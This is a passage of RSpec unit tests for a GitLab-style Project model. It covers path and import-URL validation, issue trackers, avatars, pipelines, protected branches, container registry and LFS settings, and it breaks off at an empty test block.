describe 'wiki path conflict' do
context "when the new path has been used by the wiki of other Project" do
it 'has an error on the name attribute' do
new_project = build_stubbed(:project, namespace_id: project.namespace_id, path: "#{project.path}.wiki")
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
context "when the new wiki path has been used by the path of other Project" do
it 'has an error on the name attribute' do
project_with_wiki_suffix = create(:project, path: 'foo.wiki')
new_project = build_stubbed(:project, namespace_id: project_with_wiki_suffix.namespace_id, path: 'foo')
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
end
context 'repository storages inclussion' do
let(:project2) { build(:project, repository_storage: 'missing') }
before do
storages = { 'custom' => 'tmp/tests/custom_repositories' }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it "does not allow repository storages that don't match a label in the configuration" do
expect(project2).not_to be_valid
expect(project2.errors[:repository_storage].first).to match(/is not included in the list/)
end
end
it 'does not allow an invalid URI as import_url' do
project2 = build(:empty_project, import_url: 'invalid://')
expect(project2).not_to be_valid
end
it 'does allow a valid URI as import_url' do
project2 = build(:empty_project, import_url: 'ssh://[email protected]/project.git')
expect(project2).to be_valid
end
it 'allows an empty URI' do
project2 = build(:empty_project, import_url: '')
expect(project2).to be_valid
end
it 'does not produce import data on an empty URI' do
project2 = build(:empty_project, import_url: '')
expect(project2.import_data).to be_nil
end
it 'does not produce import data on an invalid URI' do
project2 = build(:empty_project, import_url: 'test://')
expect(project2.import_data).to be_nil
end
describe 'project pending deletion' do
let!(:project_pending_deletion) do
create(:empty_project,
pending_delete: true)
end
let(:new_project) do
build(:empty_project,
name: project_pending_deletion.name,
namespace: project_pending_deletion.namespace)
end
before do
new_project.validate
end
it 'contains errors related to the project being deleted' do
expect(new_project.errors.full_messages.first).to eq('The project is still being deleted. Please try again later.')
end
end
end
describe 'default_scope' do
it 'excludes projects pending deletion from the results' do
project = create(:empty_project)
create(:empty_project, pending_delete: true)
expect(Project.all).to eq [project]
end
end
describe 'project token' do
it 'sets an random token if none provided' do
project = FactoryGirl.create :empty_project, runners_token: ''
expect(project.runners_token).not_to eq('')
end
it 'does not set an random token if one provided' do
project = FactoryGirl.create :empty_project, runners_token: 'my-token'
expect(project.runners_token).to eq('my-token')
end
end
describe 'Respond to' do
it { is_expected.to respond_to(:url_to_repo) }
it { is_expected.to respond_to(:repo_exists?) }
it { is_expected.to respond_to(:execute_hooks) }
it { is_expected.to respond_to(:owner) }
it { is_expected.to respond_to(:path_with_namespace) }
end
describe 'delegation' do
it { is_expected.to delegate_method(:add_guest).to(:team) }
it { is_expected.to delegate_method(:add_reporter).to(:team) }
it { is_expected.to delegate_method(:add_developer).to(:team) }
it { is_expected.to delegate_method(:add_master).to(:team) }
end
describe '#name_with_namespace' do
let(:project) { build_stubbed(:empty_project) }
it { expect(project.name_with_namespace).to eq "#{project.namespace.human_name} / #{project.name}" }
it { expect(project.human_name).to eq project.name_with_namespace }
end
describe '#to_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, path: 'sample-namespace', owner: owner) }
let(:project) { create(:empty_project, path: 'sample-project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:empty_project, name: 'another-project') }
it 'returns complete path to the project' do
expect(project.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:empty_project, namespace: namespace) }
it 'returns complete path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-project'
end
end
end
describe '#to_human_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, name: 'Sample namespace', owner: owner) }
let(:project) { create(:empty_project, name: 'Sample project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_human_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_human_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:empty_project, name: 'another-project') }
it 'returns complete name with namespace of the project' do
expect(project.to_human_reference(another_namespace_project)).to eq 'Gitlab / Sample project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:empty_project, namespace: namespace) }
it 'returns name of the project' do
expect(project.to_human_reference(another_project)).to eq 'Sample project'
end
end
end
describe '#repository_storage_path' do
let(:project) { create(:project, repository_storage: 'custom') }
before do
FileUtils.mkdir('tmp/tests/custom_repositories')
storages = { 'custom' => 'tmp/tests/custom_repositories' }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
after do
FileUtils.rm_rf('tmp/tests/custom_repositories')
end
it 'returns the repository storage path' do
expect(project.repository_storage_path).to eq('tmp/tests/custom_repositories')
end
end
it 'returns valid url to repo' do
project = Project.new(path: 'somewhere')
expect(project.url_to_repo).to eq(Gitlab.config.gitlab_shell.ssh_path_prefix + 'somewhere.git')
end
describe "#web_url" do
let(:project) { create(:empty_project, path: "somewhere") }
it 'returns the full web URL for this repo' do
expect(project.web_url).to eq("#{Gitlab.config.gitlab.url}/#{project.namespace.path}/somewhere")
end
end
describe "#new_issue_address" do
let(:project) { create(:empty_project, path: "somewhere") }
let(:user) { create(:user) }
context 'incoming email enabled' do
before do
stub_incoming_email_setting(enabled: true, address: "p+%{key}@gl.ab")
end
it 'returns the address to create a new issue' do
address = "p+#{project.path_with_namespace}+#{user.incoming_email_token}@gl.ab"
expect(project.new_issue_address(user)).to eq(address)
end
end
context 'incoming email disabled' do
before do
stub_incoming_email_setting(enabled: false)
end
it 'returns nil' do
expect(project.new_issue_address(user)).to be_nil
end
end
end
describe 'last_activity methods' do
let(:timestamp) { 2.hours.ago }
# last_activity_at gets set to created_at upon creation
let(:project) { create(:project, created_at: timestamp, updated_at: timestamp) }
describe 'last_activity' do
it 'alias last_activity to last_event' do
last_event = create(:event, project: project)
expect(project.last_activity).to eq(last_event)
end
end
describe 'last_activity_date' do
it 'returns the creation date of the project\'s last event if present' do
new_event = create(:event, project: project, created_at: Time.now)
project.reload
expect(project.last_activity_at.to_i).to eq(new_event.created_at.to_i)
end
it 'returns the project\'s last update date if it has no events' do
expect(project.last_activity_date).to eq(project.updated_at)
end
end
end
describe '#get_issue' do
let(:project) { create(:empty_project) }
let!(:issue) { create(:issue, project: project) }
let(:user) { create(:user) }
before do
project.team << [user, :developer]
end
context 'with default issues tracker' do
it 'returns an issue' do
expect(project.get_issue(issue.iid, user)).to eq issue
end
it 'returns count of open issues' do
expect(project.open_issues_count).to eq(1)
end
it 'returns nil when no issue found' do
expect(project.get_issue(999, user)).to be_nil
end
it "returns nil when user doesn't have access" do
user = create(:user)
expect(project.get_issue(issue.iid, user)).to eq nil
end
end
context 'with external issues tracker' do
before do
allow(project).to receive(:default_issues_tracker?).and_return(false)
end
it 'returns an ExternalIssue' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq 'FOO-1234'
expect(issue.project).to eq project
end
end
end
describe '#issue_exists?' do
let(:project) { create(:empty_project) }
it 'is truthy when issue exists' do
expect(project).to receive(:get_issue).and_return(double)
expect(project.issue_exists?(1)).to be_truthy
end
it 'is falsey when issue does not exist' do
expect(project).to receive(:get_issue).and_return(nil)
expect(project.issue_exists?(1)).to be_falsey
end
end
describe '#to_param' do
context 'with namespace' do
before do
@group = create :group, name: 'gitlab'
@project = create(:project, name: 'gitlabhq', namespace: @group)
end
it { expect(@project.to_param).to eq('gitlabhq') }
end
context 'with invalid path' do
it 'returns previous path to keep project suitable for use in URLs when persisted' do
project = create(:empty_project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'gitlab'
end
it 'returns current path when new record' do
project = build(:empty_project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'foo&bar'
end
end
end
describe '#repository' do
let(:project) { create(:project) }
it 'returns valid repo' do
expect(project.repository).to be_kind_of(Repository)
end
end
describe '#default_issues_tracker?' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
it "is true if used internal tracker" do
expect(project.default_issues_tracker?).to be_truthy
end
it "is false if used other tracker" do
expect(ext_project.default_issues_tracker?).to be_falsey
end
end
describe '#external_issue_tracker' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
context 'on existing projects with no value for has_external_issue_tracker' do
before(:each) do
project.update_column(:has_external_issue_tracker, nil)
ext_project.update_column(:has_external_issue_tracker, nil)
end
it 'updates the has_external_issue_tracker boolean' do
expect do
project.external_issue_tracker
end.to change { project.reload.has_external_issue_tracker }.to(false)
expect do
ext_project.external_issue_tracker
end.to change { ext_project.reload.has_external_issue_tracker }.to(true)
end
end
it 'returns nil and does not query services when there is no external issue tracker' do
expect(project).not_to receive(:services)
expect(project.external_issue_tracker).to eq(nil)
end
it 'retrieves external_issue_tracker querying services and cache it when there is external issue tracker' do
ext_project.reload # Factory returns a project with changed attributes
expect(ext_project).to receive(:services).once.and_call_original
2.times { expect(ext_project.external_issue_tracker).to be_a_kind_of(RedmineService) }
end
end
describe '#cache_has_external_issue_tracker' do
let(:project) { create(:project, has_external_issue_tracker: nil) }
it 'stores true if there is any external_issue_tracker' do
services = double(:service, external_issue_trackers: [RedmineService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(true)
end
it 'stores false if there is no external_issue_tracker' do
services = double(:service, external_issue_trackers: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(false)
end
end
describe '#has_wiki?' do
let(:no_wiki_project) { create(:project, wiki_access_level: ProjectFeature::DISABLED, has_external_wiki: false) }
let(:wiki_enabled_project) { create(:project) }
let(:external_wiki_project) { create(:project, has_external_wiki: true) }
it 'returns true if project is wiki enabled or has external wiki' do
expect(wiki_enabled_project).to have_wiki
expect(external_wiki_project).to have_wiki
expect(no_wiki_project).not_to have_wiki
end
end
describe '#external_wiki' do
let(:project) { create(:project) }
context 'with an active external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: true)
project.external_wiki
end
it 'sets :has_external_wiki as true' do
expect(project.has_external_wiki).to be(true)
end
it 'sets :has_external_wiki as false if an external wiki service is destroyed later' do
expect(project.has_external_wiki).to be(true)
project.services.external_wikis.first.destroy
expect(project.has_external_wiki).to be(false)
end
end
context 'with an inactive external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: false)
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
end
context 'with no external wiki' do
before do
project.external_wiki
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
it 'sets :has_external_wiki as true if an external wiki service is created later' do
expect(project.has_external_wiki).to be(false)
create(:service, project: project, type: 'ExternalWikiService', active: true)
expect(project.has_external_wiki).to be(true)
end
end
end
describe '#open_branches' do
let(:project) { create(:project) }
before do
project.protected_branches.create(name: 'master')
end
it { expect(project.open_branches.map(&:name)).to include('feature') }
it { expect(project.open_branches.map(&:name)).not_to include('master') }
it "includes branches matching a protected branch wildcard" do
expect(project.open_branches.map(&:name)).to include('feature')
create(:protected_branch, name: 'feat*', project: project)
expect(Project.find(project.id).open_branches.map(&:name)).to include('feature')
end
end
describe '#star_count' do
it 'counts stars from multiple users' do
user1 = create :user
user2 = create :user
project = create :project, :public
expect(project.star_count).to eq(0)
user1.toggle_star(project)
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(2)
user1.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(0)
end
it 'counts stars on the right project' do
user = create :user
project1 = create :project, :public
project2 = create :project, :public
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(1)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(1)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
end
end
describe '#avatar_type' do
let(:project) { create(:project) }
it 'is true if avatar is image' do
project.update_attribute(:avatar, 'uploads/avatar.png')
expect(project.avatar_type).to be_truthy
end
it 'is false if avatar is html page' do
project.update_attribute(:avatar, 'uploads/avatar.html')
expect(project.avatar_type).to eq(['only images allowed'])
end
end
describe '#avatar_url' do
subject { project.avatar_url }
let(:project) { create(:project) }
context 'When avatar file is uploaded' do
before do
project.update_columns(avatar: 'uploads/avatar.png')
allow(project.avatar).to receive(:present?) { true }
end
let(:avatar_path) do
"/uploads/project/avatar/#{project.id}/uploads/avatar.png"
end
it { should eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'When avatar file in git' do
before do
allow(project).to receive(:avatar_in_git) { true }
end
let(:avatar_path) do
"/#{project.namespace.name}/#{project.path}/avatar"
end
it { should eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'when git repo is empty' do
let(:project) { create(:empty_project) }
it { should eq nil }
end
end
describe '#pipeline_for' do
let(:project) { create(:project) }
let!(:pipeline) { create_pipeline }
shared_examples 'giving the correct pipeline' do
it { is_expected.to eq(pipeline) }
context 'return latest' do
let!(:pipeline2) { create_pipeline }
it { is_expected.to eq(pipeline2) }
end
end
context 'with explicit sha' do
subject { project.pipeline_for('master', pipeline.sha) }
it_behaves_like 'giving the correct pipeline'
end
context 'with implicit sha' do
subject { project.pipeline_for('master') }
it_behaves_like 'giving the correct pipeline'
end
def create_pipeline
create(:ci_pipeline,
project: project,
ref: 'master',
sha: project.commit('master').sha)
end
end
describe '#builds_enabled' do
let(:project) { create :project }
subject { project.builds_enabled }
it { expect(project.builds_enabled?).to be_truthy }
end
describe '.cached_count', caching: true do
let(:group) { create(:group, :public) }
let!(:project1) { create(:empty_project, :public, group: group) }
let!(:project2) { create(:empty_project, :public, group: group) }
it 'returns total project count' do
expect(Project).to receive(:count).once.and_call_original
3.times do
expect(Project.cached_count).to eq(2)
end
end
end
describe '.trending' do
let(:group) { create(:group, :public) }
let(:project1) { create(:empty_project, :public, group: group) }
let(:project2) { create(:empty_project, :public, group: group) }
before do
2.times do
create(:note_on_commit, project: project1)
end
create(:note_on_commit, project: project2)
TrendingProject.refresh!
end
subject { described_class.trending.to_a }
it 'sorts projects by the amount of notes in descending order' do
expect(subject).to eq([project1, project2])
end
it 'does not take system notes into account' do
10.times do
create(:note_on_commit, project: project2, system: true)
end
expect(described_class.trending.to_a).to eq([project1, project2])
end
end
describe '.visible_to_user' do
let!(:project) { create(:project, :private) }
let!(:user) { create(:user) }
subject { described_class.visible_to_user(user) }
describe 'when a user has access to a project' do
before do
project.add_user(user, Gitlab::Access::MASTER)
end
it { is_expected.to eq([project]) }
end
describe 'when a user does not have access to any projects' do
it { is_expected.to eq([]) }
end
end
context 'repository storage by default' do
let(:project) { create(:empty_project) }
before do
storages = {
'default' => 'tmp/tests/repositories',
'picked' => 'tmp/tests/repositories',
}
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it 'picks storage from ApplicationSetting' do
expect_any_instance_of(ApplicationSetting).to receive(:pick_repository_storage).and_return('picked')
expect(project.repository_storage).to eq('picked')
end
end
context 'shared runners by default' do
let(:project) { create(:empty_project) }
subject { project.shared_runners_enabled }
context 'are enabled' do
before { stub_application_setting(shared_runners_enabled: true) }
it { is_expected.to be_truthy }
end
context 'are disabled' do
before { stub_application_setting(shared_runners_enabled: false) }
it { is_expected.to be_falsey }
end
end
describe '#any_runners' do
let(:project) { create(:empty_project, shared_runners_enabled: shared_runners_enabled) }
let(:specific_runner) { create(:ci_runner) }
let(:shared_runner) { create(:ci_runner, :shared) }
context 'for shared runners disabled' do
let(:shared_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a specific runner' do
project.runners << specific_runner
expect(project.any_runners?).to be_truthy
end
it 'has a shared runner, but they are prohibited to use' do
shared_runner
expect(project.any_runners?).to be_falsey
end
it 'checks the presence of specific runner' do
project.runners << specific_runner
expect(project.any_runners? { |runner| runner == specific_runner }).to be_truthy
end
end
context 'for shared runners enabled' do
let(:shared_runners_enabled) { true }
it 'has a shared runner' do
shared_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of shared runner' do
shared_runner
expect(project.any_runners? { |runner| runner == shared_runner }).to be_truthy
end
end
end
describe '#visibility_level_allowed?' do
let(:project) { create(:project, :internal) }
context 'when checking on non-forked project' do
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_truthy }
end
context 'when checking on forked project' do
let(:project) { create(:project, :internal) }
let(:forked_project) { create(:project, forked_from_project: project) }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '.search' do
let(:project) { create(:project, description: 'kitten mittens') }
it 'returns projects with a matching name' do
expect(described_class.search(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search(project.name[0..2])).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search(project.name.upcase)).to eq([project])
end
it 'returns projects with a matching description' do
expect(described_class.search(project.description)).to eq([project])
end
it 'returns projects with a partially matching description' do
expect(described_class.search('kitten')).to eq([project])
end
it 'returns projects with a matching description regardless of the casing' do
expect(described_class.search('KITTEN')).to eq([project])
end
it 'returns projects with a matching path' do
expect(described_class.search(project.path)).to eq([project])
end
it 'returns projects with a partially matching path' do
expect(described_class.search(project.path[0..2])).to eq([project])
end
it 'returns projects with a matching path regardless of the casing' do
expect(described_class.search(project.path.upcase)).to eq([project])
end
it 'returns projects with a matching namespace name' do
expect(described_class.search(project.namespace.name)).to eq([project])
end
it 'returns projects with a partially matching namespace name' do
expect(described_class.search(project.namespace.name[0..2])).to eq([project])
end
it 'returns projects with a matching namespace name regardless of the casing' do
expect(described_class.search(project.namespace.name.upcase)).to eq([project])
end
it 'returns projects when eager loading namespaces' do
relation = described_class.all.includes(:namespace)
expect(relation.search(project.namespace.name)).to eq([project])
end
end
describe '#rename_repo' do
let(:project) { create(:project) }
let(:gitlab_shell) { Gitlab::Shell.new }
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
ns = project.namespace_dir
expect(gitlab_shell).to receive(:mv_repository).
ordered.
with(project.repository_storage_path, "#{ns}/foo", "#{ns}/#{project.path}").
and_return(true)
expect(gitlab_shell).to receive(:mv_repository).
ordered.
with(project.repository_storage_path, "#{ns}/foo.wiki", "#{ns}/#{project.path}.wiki").
and_return(true)
expect_any_instance_of(SystemHooksService).
to receive(:execute_hooks_for).
with(project, :rename)
expect_any_instance_of(Gitlab::UploadsTransfer).
to receive(:rename_project).
with('foo', project.path, ns)
expect(project).to receive(:expire_caches_before_rename)
project.rename_repo
end
context 'container registry with tags' do
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags('tag')
end
subject { project.rename_repo }
it { expect{subject}.to raise_error(Exception) }
end
end
describe '#expire_caches_before_rename' do
let(:project) { create(:project) }
let(:repo) { double(:repo, exists?: true) }
let(:wiki) { double(:wiki, exists?: true) }
it 'expires the caches of the repository and wiki' do
allow(Repository).to receive(:new).
with('foo', project).
and_return(repo)
allow(Repository).to receive(:new).
with('foo.wiki', project).
and_return(wiki)
expect(repo).to receive(:before_delete)
expect(wiki).to receive(:before_delete)
project.expire_caches_before_rename('foo')
end
end
describe '.search_by_title' do
let(:project) { create(:project, name: 'kittens') }
it 'returns projects with a matching name' do
expect(described_class.search_by_title(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search_by_title('kitten')).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search_by_title('KITTENS')).to eq([project])
end
end
context 'when checking projects from groups' do
let(:private_group) { create(:group, visibility_level: 0) }
let(:internal_group) { create(:group, visibility_level: 10) }
let(:private_project) { create :project, :private, group: private_group }
let(:internal_project) { create :project, :internal, group: internal_group }
context 'when group is private project can not be internal' do
it { expect(private_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_falsey }
end
context 'when group is internal project can not be public' do
it { expect(internal_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#create_repository' do
let(:project) { create(:project) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
context 'using a regular repository' do
it 'creates the repository' do
expect(shell).to receive(:add_repository).
with(project.repository_storage_path, project.path_with_namespace).
and_return(true)
expect(project.repository).to receive(:after_create)
expect(project.create_repository).to eq(true)
end
it 'adds an error if the repository could not be created' do
expect(shell).to receive(:add_repository).
with(project.repository_storage_path, project.path_with_namespace).
and_return(false)
expect(project.repository).not_to receive(:after_create)
expect(project.create_repository).to eq(false)
expect(project.errors).not_to be_empty
end
end
context 'using a forked repository' do
it 'does nothing' do
expect(project).to receive(:forked?).and_return(true)
expect(shell).not_to receive(:add_repository)
project.create_repository
end
end
end
describe '#protected_branch?' do
context 'existing project' do
let(:project) { create(:project) }
it 'returns true when the branch matches a protected branch via direct match' do
create(:protected_branch, project: project, name: "foo")
expect(project.protected_branch?('foo')).to eq(true)
end
it 'returns true when the branch matches a protected branch via wildcard match' do
create(:protected_branch, project: project, name: "production/*")
expect(project.protected_branch?('production/some-branch')).to eq(true)
end
it 'returns false when the branch does not match a protected branch via direct match' do
expect(project.protected_branch?('foo')).to eq(false)
end
it 'returns false when the branch does not match a protected branch via wildcard match' do
create(:protected_branch, project: project, name: "production/*")
expect(project.protected_branch?('staging/some-branch')).to eq(false)
end
end
context "new project" do
let(:project) { create(:empty_project) }
it 'returns false when default_protected_branch is unprotected' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
expect(project.protected_branch?('master')).to be false
end
it 'returns false when default_protected_branch lets developers push' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
expect(project.protected_branch?('master')).to be false
end
it 'returns true when default_branch_protection does not let developers push but let developer merge branches' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
expect(project.protected_branch?('master')).to be true
end
it 'returns true when default_branch_protection is in full protection' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_FULL)
expect(project.protected_branch?('master')).to be true
end
end
end
describe '#user_can_push_to_empty_repo?' do
let(:project) { create(:empty_project) }
let(:user) { create(:user) }
it 'returns false when default_branch_protection is in full protection and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_FULL)
expect(project.user_can_push_to_empty_repo?(user)).to be_falsey
end
it 'returns false when default_branch_protection only lets devs merge and user is dev' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
expect(project.user_can_push_to_empty_repo?(user)).to be_falsey
end
it 'returns true when default_branch_protection lets devs push and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
it 'returns true when default_branch_protection is unprotected and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
it 'returns true when user is master' do
project.team << [user, :master]
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
end
describe '#container_registry_path_with_namespace' do
let(:project) { create(:empty_project, path: 'PROJECT') }
subject { project.container_registry_path_with_namespace }
it { is_expected.not_to eq(project.path_with_namespace) }
it { is_expected.to eq(project.path_with_namespace.downcase) }
end
describe '#container_registry_repository' do
let(:project) { create(:empty_project) }
before { stub_container_registry_config(enabled: true) }
subject { project.container_registry_repository }
it { is_expected.not_to be_nil }
end
describe '#container_registry_repository_url' do
let(:project) { create(:empty_project) }
subject { project.container_registry_repository_url }
before { stub_container_registry_config(**registry_settings) }
context 'for enabled registry' do
let(:registry_settings) do
{
enabled: true,
host_port: 'example.com',
}
end
it { is_expected.not_to be_nil }
end
context 'for disabled registry' do
let(:registry_settings) do
{
enabled: false
}
end
it { is_expected.to be_nil }
end
end
describe '#has_container_registry_tags?' do
let(:project) { create(:empty_project) }
subject { project.has_container_registry_tags? }
context 'for enabled registry' do
before { stub_container_registry_config(enabled: true) }
context 'with tags' do
before { stub_container_registry_tags('test', 'test2') }
it { is_expected.to be_truthy }
end
context 'when no tags' do
before { stub_container_registry_tags }
it { is_expected.to be_falsey }
end
end
context 'for disabled registry' do
before { stub_container_registry_config(enabled: false) }
it { is_expected.to be_falsey }
end
end
describe '#latest_successful_builds_for' do
def create_pipeline(status = 'success')
create(:ci_pipeline, project: project,
sha: project.commit.sha,
ref: project.default_branch,
status: status)
end
def create_build(new_pipeline = pipeline, name = 'test')
create(:ci_build, :success, :artifacts,
pipeline: new_pipeline,
status: new_pipeline.status,
name: name)
end
let(:project) { create(:project) }
let(:pipeline) { create_pipeline }
context 'with many builds' do
it 'gives the latest builds from latest pipeline' do
pipeline1 = create_pipeline
pipeline2 = create_pipeline
build1_p2 = create_build(pipeline2, 'test')
create_build(pipeline1, 'test')
create_build(pipeline1, 'test2')
build2_p2 = create_build(pipeline2, 'test2')
latest_builds = project.latest_successful_builds_for
expect(latest_builds).to contain_exactly(build2_p2, build1_p2)
end
end
context 'with succeeded pipeline' do
let!(:build) { create_build }
context 'standalone pipeline' do
it 'returns builds for ref for default_branch' do
builds = project.latest_successful_builds_for
expect(builds).to contain_exactly(build)
end
it 'returns empty relation if the build cannot be found' do
builds = project.latest_successful_builds_for('TAIL')
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
context 'with some pending pipeline' do
before do
create_build(create_pipeline('pending'))
end
it 'gives the latest build from latest pipeline' do
latest_build = project.latest_successful_builds_for
expect(latest_build).to contain_exactly(build)
end
end
end
context 'with pending pipeline' do
before do
pipeline.update(status: 'pending')
create_build(pipeline)
end
it 'returns empty relation' do
builds = project.latest_successful_builds_for
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
end
describe '#add_import_job' do
context 'forked' do
let(:forked_project_link) { create(:forked_project_link) }
let(:forked_from_project) { forked_project_link.forked_from_project }
let(:project) { forked_project_link.forked_to_project }
it 'schedules a RepositoryForkWorker job' do
expect(RepositoryForkWorker).to receive(:perform_async).
with(project.id, forked_from_project.repository_storage_path,
forked_from_project.path_with_namespace, project.namespace.path)
project.add_import_job
end
end
context 'not forked' do
let(:project) { create(:project) }
it 'schedules a RepositoryImportWorker job' do
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id)
project.add_import_job
end
end
end
describe '#gitlab_project_import?' do
subject(:project) { build(:project, import_type: 'gitlab_project') }
it { expect(project.gitlab_project_import?).to be true }
end
describe '#gitea_import?' do
subject(:project) { build(:project, import_type: 'gitea') }
it { expect(project.gitea_import?).to be true }
end
describe '#lfs_enabled?' do
let(:project) { create(:project) }
shared_examples 'project overrides group' do
it 'returns true when enabled in project' do
project.update_attribute(:lfs_enabled, true)
expect(project.lfs_enabled?).to be_truthy
end
it 'returns false when disabled in project' do
project.update_attribute(:lfs_enabled, false)
expect(project.lfs_enabled?).to be_falsey
end
it 'returns the value from the namespace, when no value is set in project' do
expect(project.lfs_enabled?).to eq(project.namespace.lfs_enabled?)
end
end
context 'LFS disabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, false)
enable_lfs
end
it_behaves_like 'project overrides group'
end
context 'LFS enabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
enable_lfs
end
it_behaves_like 'project overrides group'
end
describe 'LFS disabled globally' do
shared_examples 'it always returns false' do
it do
expect(project.lfs_enabled?).to be_falsey
expect(project.namespace.lfs_enabled?).to be_falsey
end
end
context 'when no values are set' do
it_behaves_like 'it always returns false'
end
context 'when all values are set to true' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
project.update_attribute(:lfs_enabled, true)
end
it_behaves_like 'it always returns false'
end
end
end
describe '#change_head' do
let(:project) { create(:project) }
it 'calls the before_change_head and after_change_head methods' do
expect(project.repository).to receive(:before_change_head)
expect(project.repository).to receive(:after_change_head)
project.change_head(project.default_branch)
end
it 'creates the new reference with rugged' do
expect(project.repository.rugged.references).to receive(:create).with('HEAD',
"refs/heads/#{project.default_branch}",
force: true)
project.change_head(project.default_branch)
end
it 'copies the gitattributes' do
expect(project.repository).to receive(:copy_gitattributes).with(project.default_branch)
project.change_head(project.default_branch)
end
it 'reloads the default branch' do
expect(project).to receive(:reload_default_branch)
project.change_head(project.default_branch)
end
end
describe '#pushes_since_gc' do
